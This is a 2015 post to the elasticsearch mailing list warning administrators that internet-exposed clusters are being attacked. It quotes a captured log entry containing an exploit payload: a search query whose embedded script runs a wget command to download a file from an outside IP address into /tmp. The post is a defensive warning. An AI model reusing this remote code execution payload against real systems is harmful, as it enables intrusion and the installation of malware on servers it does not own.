Warning: Exploiting attempts for ES..

Thu, 16 Apr 2015 07:57:13 -0700 

In case your elasticsearch cluster is internet-accessible: Be aware folks
on the internet are probably trying to exploit it...

Found this in our logging today (This is only our staging environment
fortunately):


Caused by: org.elasticsearch.search.SearchParseException:
[logstash-2015.04.15][0]: query[ConstantScore(*:*)],from[-1],size[-1]:
Parse Failure [Failed to parse source [{"query": {"filtered": {"query":
{"match_all": {}}}}, "script_fields": {"exp": {"script": "import
java.util.*;import java.io.*;String str = \"\";BufferedReader br = new
BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O
/tmp/ruvn http://122.224.48.28:8000/ruvn\";).getInputStream()));StringBuilder
sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},
"size": 1}]]

-- 
Met vriendelijke groet,
Kind regards,

Eike Dehling
Lead Developer

Buzzcapture
Herengracht 180, 1016 BR, Amsterdam

T: +31 (0)20 3200377
M: +31 (0)6 45144840

LinkedIn | @buzzcapture

Recent

11-03-2015: Donderdag 26 maart organiseert Buzzcapture #Buzz15
<https://www.buzzcapture.com/2015/03/buzz15-met-linkedin-uwv-en-anp/> in de
Hermitage te Amsterdam
02-03-2015: Buzzcapture breidt webcaredienstverlening uit
<http://www.buzzcapture.com/2015/03/buzzcapture-breidt-webcaredienstverlening-uit-met-whatsapp/>
met
WhatsApp
01-03-2014: Veel bestaande klanten integreren print
<https://www.buzzcapture.com/blog/buzzcapture-biedt-en-online-geintegreerde-monitoring-aan/>
content
in Social Media Dashboard
26-02-2015: Buzzcapture te horen op Radio 1
<https://www.buzzcapture.com/2015/02/banendag-op-twitter-hoe-vind-je-een-baan-via-jouwbaan/>over
Banendag op Twitter

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAMp7VWR4DTUri2gdkN3sMScpeXEo6isEi_%2BSHbu5vtYJmxh7pw%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.

Reply via email to